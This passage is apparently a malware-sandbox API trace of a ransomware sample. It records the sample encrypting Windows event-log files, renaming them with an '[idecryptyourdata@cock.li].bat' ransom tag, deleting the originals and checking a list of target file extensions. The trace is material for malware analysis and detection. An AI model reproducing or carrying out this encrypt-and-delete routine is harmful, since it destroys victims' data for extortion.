lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.072] lstrlenW (lpString=".1cd") returned 4 [0065.072] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.072] lstrlenW (lpString=".jpg") returned 4 [0065.072] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.072] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.072] lstrlenW (lpString=".doc") returned 4 [0065.072] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString=".docx") returned 5 [0065.072] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.072] lstrlenW (lpString=".pdf") returned 4 [0065.072] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString=".xls") returned 4 [0065.072] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.072] lstrlenW (lpString=".xlsx") returned 5 [0065.072] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.072] lstrlenW (lpString=".ppt") returned 4 [0065.072] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.073] lstrlenW (lpString=".zip") returned 4 [0065.073] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString=".rar") returned 4 [0065.073] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString=".bz2") returned 4 [0065.073] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString=".7z") returned 3 [0065.073] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.073] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.073] lstrlenW (lpString=".dbf") returned 4 [0065.073] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.073] lstrlenW (lpString=".1cd") returned 4 [0065.073] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.073] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0065.073] lstrlenW (lpString=".jpg") returned 4 [0065.073] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.073] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.073] lstrlenW (lpString="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 51 [0065.073] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0065.073] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0065.073] CloseHandle (hObject=0x37c) returned 1 [0065.074] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 0x20 [0065.074] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.074] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0065.074] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.074] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.074] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0065.786] GetLastError () returned 0x0 [0065.786] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.797] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.798] ReadFile (in: hFile=0x37c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.798] WriteFile (in: hFile=0x394, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x13a, lpOverlapped=0x0) returned 1 [0065.799] SetEndOfFile (hFile=0x394) returned 1 [0065.799] CloseHandle (hObject=0x394) returned 1 [0065.801] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.801] SetEndOfFile (hFile=0x37c) returned 1 [0065.802] CloseHandle (hObject=0x37c) returned 1 [0065.802] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.802] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 1 [0065.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.805] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.805] lstrlenW (lpString=".doc") returned 4 [0065.806] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".docx") returned 5 [0065.806] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.806] lstrlenW (lpString=".pdf") returned 4 [0065.806] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".xls") returned 4 [0065.806] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".xlsx") returned 5 [0065.806] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.806] lstrlenW (lpString=".ppt") returned 4 [0065.806] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.806] lstrlenW (lpString=".zip") returned 4 [0065.806] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".rar") returned 4 [0065.806] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".bz2") returned 4 [0065.806] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString=".7z") returned 3 [0065.806] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.806] lstrlenW (lpString=".dbf") returned 4 [0065.806] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.806] lstrlenW (lpString=".1cd") returned 4 [0065.806] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.806] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.806] lstrlenW (lpString=".jpg") returned 4 [0065.806] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.807] lstrlenW (lpString=".doc") returned 4 [0065.807] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".docx") returned 5 [0065.807] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.807] lstrlenW (lpString=".pdf") returned 4 [0065.807] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".xls") returned 4 [0065.807] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".xlsx") returned 5 [0065.807] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.807] lstrlenW (lpString=".ppt") returned 4 [0065.807] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.807] lstrlenW (lpString=".zip") returned 4 [0065.807] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".rar") returned 4 [0065.807] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".bz2") returned 4 [0065.807] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString=".7z") returned 3 [0065.807] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.807] lstrlenW (lpString=".dbf") returned 4 [0065.807] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.807] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.807] lstrlenW (lpString=".1cd") returned 4 [0065.807] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.808] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0065.808] lstrlenW (lpString=".jpg") returned 4 [0065.808] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.808] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.808] lstrlenW (lpString="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 47 [0065.808] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.808] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0065.808] CloseHandle (hObject=0x39c) returned 1 [0065.808] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 0x20 [0065.809] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.809] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.809] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.809] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.809] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0065.809] GetLastError () returned 0x0 [0065.809] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.812] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.814] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.814] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x132, lpOverlapped=0x0) returned 1 [0065.815] SetEndOfFile (hFile=0x37c) returned 1 [0065.815] CloseHandle (hObject=0x37c) returned 1 [0065.817] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.817] SetEndOfFile (hFile=0x39c) returned 1 [0065.818] CloseHandle (hObject=0x39c) returned 1 [0065.818] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.819] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 1 [0065.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.819] lstrlenW (lpString=".doc") returned 4 [0065.819] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.819] lstrlenW (lpString=".docx") returned 5 [0065.819] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.819] lstrlenW (lpString=".pdf") returned 4 [0065.819] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.819] lstrlenW (lpString=".xls") returned 4 [0065.819] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.819] lstrlenW (lpString=".xlsx") returned 5 [0065.819] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.819] lstrlenW (lpString=".ppt") returned 4 [0065.819] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.819] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.819] lstrlenW (lpString=".zip") returned 4 [0065.819] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.819] lstrlenW (lpString=".rar") returned 4 [0065.819] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString=".bz2") returned 4 [0065.820] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString=".7z") returned 3 [0065.820] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString=".dbf") returned 4 [0065.820] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString=".1cd") returned 4 [0065.820] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString=".jpg") returned 4 [0065.820] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString=".doc") returned 4 [0065.820] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString=".docx") returned 5 [0065.820] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.820] lstrlenW (lpString=".pdf") returned 4 [0065.820] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString=".xls") returned 4 [0065.820] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString=".xlsx") returned 5 [0065.820] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.820] lstrlenW (lpString=".ppt") returned 4 [0065.820] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.820] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.820] lstrlenW (lpString=".zip") returned 4 [0065.821] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.821] lstrlenW (lpString=".rar") returned 4 [0065.821] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.821] lstrlenW (lpString=".bz2") returned 4 [0065.821] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.821] lstrlenW (lpString=".7z") returned 3 [0065.821] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.821] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.821] lstrlenW (lpString=".dbf") returned 4 [0065.821] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.821] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.821] lstrlenW (lpString=".1cd") returned 4 [0065.821] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.821] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0065.821] lstrlenW (lpString=".jpg") returned 4 [0065.821] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.821] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.821] lstrlenW (lpString="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 49 [0065.821] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.822] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=69632) returned 1 [0065.822] CloseHandle (hObject=0x39c) returned 1 [0065.822] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 0x20 [0065.822] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.822] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0065.822] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.822] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.822] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0065.823] GetLastError () returned 0x0 [0065.823] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.826] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.829] ReadFile (in: hFile=0x39c, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.829] WriteFile (in: hFile=0x37c, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x136, lpOverlapped=0x0) returned 1 [0065.829] SetEndOfFile (hFile=0x37c) returned 1 [0065.829] CloseHandle (hObject=0x37c) returned 1 [0065.831] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.831] SetEndOfFile (hFile=0x39c) returned 1 [0065.833] CloseHandle (hObject=0x39c) returned 1 [0065.833] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.833] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 1 [0065.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.833] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.833] lstrlenW (lpString=".doc") returned 4 [0065.833] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.833] lstrlenW (lpString=".docx") returned 5 [0065.834] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.834] lstrlenW (lpString=".pdf") returned 4 [0065.834] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString=".xls") returned 4 [0065.834] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString=".xlsx") returned 5 [0065.834] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.834] lstrlenW (lpString=".ppt") returned 4 [0065.834] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.834] lstrlenW (lpString=".zip") returned 4 [0065.834] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString=".rar") returned 4 [0065.834] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString=".bz2") returned 4 [0065.834] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString=".7z") returned 3 [0065.834] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.834] lstrlenW (lpString=".dbf") returned 4 [0065.834] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.834] lstrlenW (lpString=".1cd") returned 4 [0065.834] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.834] lstrlenW (lpString=".jpg") returned 4 [0065.834] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0065.835] lstrlenW (lpString=".doc") returned 4 [0065.835] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".docx") returned 5 [0065.835] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.835] lstrlenW (lpString=".pdf") returned 4 [0065.835] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".xls") returned 4 [0065.835] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.835] lstrlenW (lpString=".xlsx") returned 5 [0065.835] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.835] lstrlenW 